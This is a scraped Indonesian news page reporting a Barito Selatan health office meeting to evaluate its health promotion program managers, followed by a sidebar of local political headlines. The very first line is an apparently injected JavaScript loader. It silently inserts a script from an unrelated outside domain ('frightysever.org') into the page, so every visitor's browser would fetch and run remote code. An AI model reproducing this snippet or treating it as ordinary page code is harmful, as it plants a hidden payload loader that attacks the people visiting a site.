(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Evaluasi Kinerja Promkes, Dinkes Gelar Pertemuan dengan Pengelola


BUNTOK, Dinas Kesehatan Barito Selatan (Barsel) menggelar pertemuan dengan pengelola program Promosi Kesehatan (Promkes), di aula Afiat Buntok, Jum’at (25/10).

Kepala Dinkes Barsel Dr Djulita K Palar mengatakan, kegiatan pertemuan dengan pengelola Promkes se Barsel yang dihadiri oleh seluruh perwakilan tiap Puskesmas sekaligus melakukan evaluasi kinerja.

“Lewat pertemuan ini kita akan melakukan evaluasi terkait pengembangan kinerja Promkes di Barsel,” kata pria yang akrap di sapa Djul itu kepada Kanalkalimantan.com, usai acara.

Ia mengatakan, pertemuan ini mengevaluasi sejauh mana promosi kesehatan dilakukan oleh pihak pengelola dari masing-masing kecamatan untuk dilakukan pengembangan yang lebih baik.

“Evaluasi pembahasan apakah ada kendala atau tidak untuk melakukan Promkes di tiap kecamatan oleh pihak pengelola,” ucap Djul.

Ia berharap kepada para petugas pelaksana atau pengelola Promkes ini bisa lebih pro aktif lagi untuk melakukan Promkes di wilayah masing-masing, sehingga masyarakat bisa dan paham dalam menyelesaikan permasalahan kesehatan di lingkungannya sendiri.

“Petugas Promkes kiranya bisa lebih aktuf lagi dalam melaksanakan tugasnya, sehingga masyarakat lebih sadar dan peduli pentingnya kesehatan itu,” pinta Djul.

Terkait program kesehatan yang menggunakan dana desa, pihaknya sangat berysukur atas hal itu, lantaran setiap desa kini miliki respon sangat baik untuk pentingnya Promkes di desa mereka.

“Artinya kami selalu berupaya untuk agar petugas kesehatan selalu pro aktif dan selalu mengkomunikasikan, bekerjasama dengan desa dalam meningkatkan pelayanan kesehatan tiap desa,” pungkas Djul. (digdo)

Reporter : Digdo
Editor : Bie

Desy Arfianty

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

5 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

5 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

6 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

9 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

10 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

20 jam ago

This website uses cookies.